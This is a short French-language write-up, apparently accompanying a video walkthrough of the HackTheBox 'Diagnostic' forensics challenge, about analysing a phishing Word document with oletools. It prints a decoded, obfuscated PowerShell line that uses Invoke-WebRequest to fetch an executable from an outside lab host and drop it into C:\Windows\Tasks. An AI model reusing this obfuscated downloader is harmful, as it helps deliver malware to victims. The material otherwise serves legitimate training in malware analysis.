Nous avons couvert l'analyse d'un exemple de document Microsoft Office Word à l'aide d'oletools pour extraire les macros et les liens pertinents. L'exemple de document contient un lien qui fait référence à une page Web contenant un code Javascript. Le code JS contenait une commande Powershell codée en base64 qui effectue un appel à un domaine externe pour récupérer un fichier exécutable. Cela faisait partie du défi médico-légal HackTheBox Diagnostic. Diagnostic HackTheBox. Cela faisait partie de Diagnostic HackTheBox.
Obtenir les notes du certificat OSCP
Le cours complet de tests d'intrusion avec BackBox
Notre SOC a identifié de nombreux e-mails de phishing prétendant détenir un document concernant une prochaine série de licenciements dans l'entreprise. Les e-mails contiennent tous un lien vers diagnostic.htb/layoffs.doc. Le DNS de ce domaine a depuis cessé de se résoudre, mais le serveur héberge toujours le document malveillant (votre docker). Jetez un œil et comprenez ce qui se passe.
Faits saillants de la vidéo
- Nous avons utilisé oléide et oléobj pour analyser le document Word nommé layoff.doc
- Le document contient un lien externe qui référence une page Web contenant un Javascript
- Nous avons utilisé le Tableau ASCII pour convertir les char[58] et char[34] en leur ASCII correspondant.
- Nous avons ensuite utilisé Cyberchef pour convertir le base64 et il a été converti en ci-dessous
${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0′ ,'E','r…s','3Ms_b4D','l3′,'toC','HT','0l_h4nD')
&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{ 6}{5}{3}{1}{7}”-f '://au','.htb/2′,'h','ic','to','agnost','mation. di','/n.exe','ttps') -OutFile « C:\Windows\Tasks\$file »
- Nous avons utilisé PowerShell pour décoder ce qui précède dans le drapeau de défi
Vidéo pas à pas
